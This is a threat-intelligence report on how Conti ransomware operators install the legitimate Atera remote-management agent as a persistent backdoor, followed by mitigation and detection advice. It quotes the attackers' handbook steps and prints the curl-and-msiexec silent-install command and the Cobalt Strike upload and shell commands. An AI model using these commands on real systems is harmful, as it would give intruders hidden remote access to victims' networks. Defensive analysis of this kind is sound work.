# Secret "Backdoor" Behind Conti Ransomware Operation: Introducing Atera Agent **[advanced-intel.com/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent](https://www.advanced-intel.com/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent)** AdvIntel August 11, 2021 Aug 11, 2021 3 min read **_By Vitali Kremez_** _This report is based on our actual proactive victim breach intelligence and subsequent_ _incident response (not a simulated or sandbox environment) identified via unique high-value_ _collections at AdvIntel._ ----- **_Adversary Tactics Chain Flow:_** 1. Conti Access via TrickBot, Buer, BazarBackdoor, AnchorDNS 2. Cobalt Strike beacon 3. Atera Agent Installation 4. Persistence & Shell Execution to Survive Cobalt Strike detections ----- _Adversaries leverage Cobalt Strike command-line interfaces to interact with systems and_ _execute other software during the course of a ransomware operation._ **_What is Atera?_** _[Atera is an IT management solution that enables monitoring, management, and](https://www.atera.com/features/#:~:text=Atera%20is%20an%20IT%20management,security%2C%20backup%2C%20and%20more)_ **_automation of hundreds of SMB IT networks from a single console. Atera includes a_** _remote control, patch management, discovery, inventory of IT assets, monitoring, security,_ _backup, and more._ ----- **_Deploying Atera Agent as "Backdoor"_** The idea behind this tactic is to leveraging a legitimate remote management agent Atera to survive possible Cobalt Strike detections from the endpoint detection and response platform. Relying on the legitimate tool to achieve persistence is a core idea leverage by the ransomware pentesting team. ----- While reviewing Conti incidents that we proactively identified, monitored, and alerted via our threat prevention platform Andariel, AdvIntel has identified that Atera played the key role in allowing secret backdoor installations on the host right after the Conti gang obtained initial access via TrickBot, BazarBackdoor, AnchorDNS, or Cobalt Strike directly. **_Conti Operational Handbook: Atera as Backdoor_** The [disgruntled Conti operator leaked the tactics matching our proactive cases.](https://www.bleepingcomputer.com/news/security/angry-conti-ransomware-affiliate-leaks-gangs-attack-playbook/) _The method includes the following steps as translated from the tutorial:_ 1. Registration of the agent access via the official website 2. Click on download and set up agent access with the script 3. Run the agent installation via the Cobalt Strike “shell atera_run.msi” 4. Observe the device beacon in the Atera system 5. Remove the installation script artifacts I. Cobalt Strike command via curl command execution for Atera Agent installation. ``` shell curl -o setup.msi "http://REDACTED.servicedesk.atera.com/GetAgent/Msi/? customerId=1&integratorLogin=REDACTED%40protonmail.com" && msiexec /i setup.msi /qn IntegratorLogin=REDACTED@protonmail.com CompanyId=1 ``` ----- II. Cobalt Strike command via the uploaded .msi installer script exported from the Atera Agent console ``` upload C:\programdata\setup_undefined.msi shell setup_undefined.msi ``` **_Atera Agent "Backdoor" Relevancy_** The Atera agent allows the following connection option for the ransomware groups to achieve persistence: Splashtop AnyDesk TeamViewer ScreenConnect Additionally, the agent allows direct command-prompt and PowerShell shell execution into the agent-installed environment. **_Operational Insight_** The Atera Agent allowed the Conti gang to regain access to infected protected environments, especially environments that were equipped with more aggressive machine learning endpoint detection-and-response anti-virus products. The benefit is obvious - once Conti receives the desired access to the trial version of Atera with the burner account they obtain a shell and backdoor access to the environment maintained by a legitimate software tool. _We asesses with high condence the theme of leveraging tooling around legitimate and_ _trusted software as a backdoor will continue to be the tactics leveraged by the_ _ransomware pentester groups based on their latest tactics._ ----- [In most of the cases, the adversaries leveraged protonmail[.]com and](http://protonmail.com/) [outlook[.]com email](http://outlook.com/) accounts to register with Atera to receive an agent installation script and console access. Therefore, this backdoor access is not a central compromise of Atera, but rather a registration loophole leveraged by the adversaries to obtain Atera trial access simply via anonymous emails. **_Mitigation_** Audit and/or block command-line interpreters by using whitelisting tools, like AppLocker or Software Restriction Policies with the focus on any suspicious “curl” command and unauthorized “.msi” installer scripts particularly those from C:\ProgramData and C:\Temp directory **_Detection Methods_** Command-line interface activities can be captured through proper logging of process execution with command-line arguments. **_Reference_** Tactic: T1059 Command and Scripting Interpreter Tactic: T1127 Trusted Developer Utilities Proxy Execution _Our proprietary platform, Andariel, provides a mirrored view of criminal and botnet activity,_ _which_ _supplies our users with predictive insight that are used to prevent intrusions from maturing_ _into large-scale threat events such as ransomware attacks._ -----